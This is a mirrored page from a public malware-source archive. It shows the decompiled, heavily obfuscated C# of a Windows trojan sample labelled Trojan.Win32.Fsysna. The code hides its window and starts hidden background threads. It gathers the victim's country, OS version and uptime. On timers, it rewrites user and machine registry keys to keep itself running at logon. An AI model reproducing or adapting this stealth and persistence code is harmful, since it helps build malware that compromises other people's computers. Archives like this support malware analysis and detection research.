mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 21:05:28 +00:00
f2ac1ece55
add
266 lines
9.3 KiB
C#
266 lines
9.3 KiB
C#
// Decompiled with JetBrains decompiler
|
||
// Type: .
|
||
// Assembly: MyApplication, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
||
// MVID: 4C1CA376-1B35-4961-80E8-8029AD6B5A8B
|
||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Fsysna.deeq-bccdbf807edf4ae3f172c9e102415d19675fee38175dc7fe4f296402da8186a9.exe
|
||
|
||
using \u0003;
|
||
using \u0005;
|
||
using \u0019;
|
||
using Microsoft.Win32;
|
||
using System;
|
||
using System.ComponentModel;
|
||
using System.Drawing;
|
||
using System.Globalization;
|
||
using System.Runtime.InteropServices;
|
||
using System.Threading;
|
||
using System.Windows.Forms;
|
||
|
||
namespace \u0019
|
||
{
|
||
internal class \u001C : Form
|
||
{
|
||
[NonSerialized]
|
||
internal static \u0002 \u0001;
|
||
private IContainer \u0001;
|
||
private System.Windows.Forms.Timer \u0002;
|
||
private System.Windows.Forms.Timer \u0003;
|
||
private System.Windows.Forms.Timer \u0004;
|
||
|
||
protected override void Dispose([In] bool obj0)
|
||
{
|
||
if (obj0 && this.\u0001 != null)
|
||
\u009E.\u007E\u0011\u0002((object) this.\u0001);
|
||
\u008A.\u001E((object) this, obj0);
|
||
}
|
||
|
||
private void \u0091()
|
||
{
|
||
this.\u0001 = (IContainer) new Container();
|
||
this.\u0002 = new System.Windows.Forms.Timer(this.\u0001);
|
||
this.\u0003 = new System.Windows.Forms.Timer(this.\u0001);
|
||
this.\u0004 = new System.Windows.Forms.Timer(this.\u0001);
|
||
\u009E.\u0016((object) this);
|
||
\u008A.\u007E\u0080((object) this.\u0002, true);
|
||
\u0097\u0002.\u007E\u0081((object) this.\u0002, 10);
|
||
\u0017\u0002.\u007E\u007F((object) this.\u0002, new EventHandler(this.\u008D));
|
||
\u008A.\u007E\u0080((object) this.\u0003, true);
|
||
\u0097\u0002.\u007E\u0081((object) this.\u0003, 5000);
|
||
\u0017\u0002.\u007E\u007F((object) this.\u0003, new EventHandler(this.\u008F));
|
||
\u008A.\u007E\u0080((object) this.\u0004, true);
|
||
\u0097\u0002.\u007E\u0081((object) this.\u0004, 10000);
|
||
\u0017\u0002.\u007E\u007F((object) this.\u0004, new EventHandler(this.\u0090));
|
||
\u008F\u0002.\u0017((object) this, new SizeF(6f, 13f));
|
||
\u0089.\u0018((object) this, AutoScaleMode.Font);
|
||
\u009F\u0002.\u001A((object) this, new Size(292, 70));
|
||
\u0008\u0002.\u0012((object) this, \u001C.\u0001(214));
|
||
\u008A.\u001B((object) this, false);
|
||
\u0008\u0002.\u007E\u0013((object) this, \u001C.\u0001(214));
|
||
\u0099\u0002.\u001C((object) this, FormWindowState.Minimized);
|
||
\u0017\u0002.\u001D((object) this, new EventHandler(this.\u008C));
|
||
\u008A.\u0015((object) this, false);
|
||
}
|
||
|
||
public static void \u0088()
|
||
{
|
||
try
|
||
{
|
||
Thread thread1 = new Thread(new ThreadStart(\u001B.\u0087));
|
||
\u009E.\u007E\u0013\u0003((object) thread1);
|
||
Thread thread2 = new Thread(new ThreadStart(\u001E.\u0095));
|
||
\u009E.\u007E\u0013\u0003((object) thread2);
|
||
}
|
||
catch
|
||
{
|
||
}
|
||
}
|
||
|
||
public \u001C()
|
||
{
|
||
this.\u0091();
|
||
\u001C.\u0088();
|
||
}
|
||
|
||
public static string \u0089([In] CultureInfo obj0)
|
||
{
|
||
try
|
||
{
|
||
RegionInfo regionInfo = new RegionInfo(\u0088.\u007E\u0090\u0003((object) obj0));
|
||
return \u0098\u0002.\u007E\u0092\u0003((object) regionInfo);
|
||
}
|
||
catch
|
||
{
|
||
return string.Empty;
|
||
}
|
||
}
|
||
|
||
public static string \u008A()
|
||
{
|
||
try
|
||
{
|
||
return \u001C.\u0089(new CultureInfo(\u0098\u0002.\u007E\u000F\u0002((object) \u0001\u0002.\u008F\u0003())));
|
||
}
|
||
catch
|
||
{
|
||
return \u001C.\u0001(223);
|
||
}
|
||
}
|
||
|
||
public static string \u008B()
|
||
{
|
||
OperatingSystem operatingSystem = \u008C\u0002.\u0091\u0002();
|
||
string str = \u001C.\u0001(236);
|
||
switch (\u001F\u0002.\u007E\u0097\u0002((object) operatingSystem))
|
||
{
|
||
case PlatformID.Win32Windows:
|
||
switch (\u0088.\u007E\u0010\u0003((object) \u0095\u0002.\u007E\u0098\u0002((object) operatingSystem)))
|
||
{
|
||
case 0:
|
||
str = \u001C.\u0001(249);
|
||
break;
|
||
case 10:
|
||
str = \u001C.\u0001(254);
|
||
break;
|
||
case 90:
|
||
str = \u001C.\u0001(259);
|
||
break;
|
||
}
|
||
break;
|
||
case PlatformID.Win32NT:
|
||
switch (\u0088.\u007E\u000F\u0003((object) \u0095\u0002.\u007E\u0098\u0002((object) operatingSystem)))
|
||
{
|
||
case 3:
|
||
str = \u001C.\u0001(264);
|
||
break;
|
||
case 4:
|
||
str = \u001C.\u0001(264);
|
||
break;
|
||
case 5:
|
||
if (\u0088.\u007E\u0010\u0003((object) \u0095\u0002.\u007E\u0098\u0002((object) operatingSystem)) == 0)
|
||
{
|
||
str = \u001C.\u0001(269);
|
||
break;
|
||
}
|
||
if (\u0088.\u007E\u0010\u0003((object) \u0095\u0002.\u007E\u0098\u0002((object) operatingSystem)) == 1)
|
||
{
|
||
str = \u001C.\u0001(278);
|
||
break;
|
||
}
|
||
if (\u0088.\u007E\u0010\u0003((object) \u0095\u0002.\u007E\u0098\u0002((object) operatingSystem)) == 2)
|
||
{
|
||
str = \u001C.\u0001(283);
|
||
break;
|
||
}
|
||
break;
|
||
case 6:
|
||
if (\u0088.\u007E\u0010\u0003((object) \u0095\u0002.\u007E\u0098\u0002((object) operatingSystem)) == 0)
|
||
{
|
||
str = \u001C.\u0001(292);
|
||
break;
|
||
}
|
||
if (\u0088.\u007E\u0010\u0003((object) \u0095\u0002.\u007E\u0098\u0002((object) operatingSystem)) == 1)
|
||
{
|
||
str = \u001C.\u0001(301);
|
||
break;
|
||
}
|
||
if (\u0088.\u007E\u0010\u0003((object) \u0095\u0002.\u007E\u0098\u0002((object) operatingSystem)) == 2)
|
||
{
|
||
str = \u001C.\u0001(310);
|
||
break;
|
||
}
|
||
break;
|
||
}
|
||
break;
|
||
}
|
||
return str;
|
||
}
|
||
|
||
private void \u008C([In] object obj0, [In] EventArgs obj1)
|
||
{
|
||
}
|
||
|
||
private void \u008D([In] object obj0, [In] EventArgs obj1) => \u009E.\u0014((object) this);
|
||
|
||
public static string \u008E()
|
||
{
|
||
TimeSpan timeSpan = new TimeSpan(0, 0, \u009F.\u008E\u0002() / 1000);
|
||
object[] objArray = new object[8]
|
||
{
|
||
(object) timeSpan.Days,
|
||
(object) \u001C.\u0001(319),
|
||
(object) timeSpan.Hours,
|
||
(object) \u001C.\u0001(332),
|
||
(object) timeSpan.Minutes,
|
||
(object) \u001C.\u0001(345),
|
||
(object) timeSpan.Seconds,
|
||
(object) \u001C.\u0001(362)
|
||
};
|
||
return \u0086\u0002.\u001C\u0002(objArray);
|
||
}
|
||
|
||
private void \u0099()
|
||
{
|
||
try
|
||
{
|
||
RegistryKey registryKey = \u009A.\u007E\u0096\u0003((object) Registry.CurrentUser, \u001C.\u0001(375), true);
|
||
if (\u0095.\u007E\u0097\u0003((object) registryKey, \u001C.\u0001(436)) == null)
|
||
\u0080\u0002.\u007E\u0098\u0003((object) registryKey, \u001C.\u0001(436), (object) \u0006\u0003.\u0008());
|
||
else if (\u0082\u0002.\u0013\u0002((string) \u0095.\u007E\u0097\u0003((object) registryKey, \u001C.\u0001(436)), \u0006\u0003.\u0008()))
|
||
{
|
||
\u0008\u0002.\u007E\u0095\u0003((object) registryKey, \u001C.\u0001(436));
|
||
\u0080\u0002.\u007E\u0098\u0003((object) registryKey, \u001C.\u0001(436), (object) \u0006\u0003.\u0008());
|
||
}
|
||
}
|
||
catch
|
||
{
|
||
}
|
||
try
|
||
{
|
||
RegistryKey registryKey = \u009A.\u007E\u0096\u0003((object) Registry.LocalMachine, \u001C.\u0001(375), true);
|
||
if (\u0095.\u007E\u0097\u0003((object) registryKey, \u001C.\u0001(436)) == null)
|
||
\u0080\u0002.\u007E\u0098\u0003((object) registryKey, \u001C.\u0001(436), (object) \u0006\u0003.\u0008());
|
||
else if (\u0082\u0002.\u0013\u0002((string) \u0095.\u007E\u0097\u0003((object) registryKey, \u001C.\u0001(436)), \u0006\u0003.\u0008()))
|
||
{
|
||
\u0008\u0002.\u007E\u0095\u0003((object) registryKey, \u001C.\u0001(436));
|
||
\u0080\u0002.\u007E\u0098\u0003((object) registryKey, \u001C.\u0001(436), (object) \u0006\u0003.\u0008());
|
||
}
|
||
}
|
||
catch
|
||
{
|
||
}
|
||
try
|
||
{
|
||
RegistryKey registryKey = \u009A.\u007E\u0096\u0003((object) Registry.LocalMachine, \u001C.\u0001(461), true);
|
||
string str = \u0098\u0002.\u007E\u000F\u0002(\u0095.\u007E\u0097\u0003((object) registryKey, \u001C.\u0001(534)));
|
||
if (!\u000E\u0002.\u007E\u0019\u0002((object) str, \u0006\u0003.\u0008()))
|
||
\u0080\u0002.\u007E\u0098\u0003((object) registryKey, \u001C.\u0001(534), (object) \u0096.\u001E\u0002(str, \u0006\u0003.\u0008(), \u001C.\u0001(547)));
|
||
}
|
||
catch
|
||
{
|
||
}
|
||
try
|
||
{
|
||
RegistryKey registryKey = \u009A.\u007E\u0096\u0003((object) Registry.LocalMachine, \u001C.\u0001(552), true);
|
||
string str = \u0098\u0002.\u007E\u000F\u0002(\u0095.\u007E\u0097\u0003((object) registryKey, \u001C.\u0001(629)));
|
||
if (!\u0082\u0002.\u0012\u0002(str, \u001C.\u0001(642)))
|
||
return;
|
||
\u0080\u0002.\u007E\u0098\u0003((object) registryKey, \u001C.\u0001(629), (object) \u001C.\u0001(647));
|
||
}
|
||
catch
|
||
{
|
||
}
|
||
}
|
||
|
||
private void \u008F([In] object obj0, [In] EventArgs obj1) => this.\u0099();
|
||
|
||
private void \u0090([In] object obj0, [In] EventArgs obj1)
|
||
{
|
||
if (\u001B.\u0003 <= 0)
|
||
return;
|
||
\u001B.\u0086(\u001C.\u0001(652));
|
||
}
|
||
|
||
static \u001C() => \u0004.\u007F();
|
||
}
|
||
}
|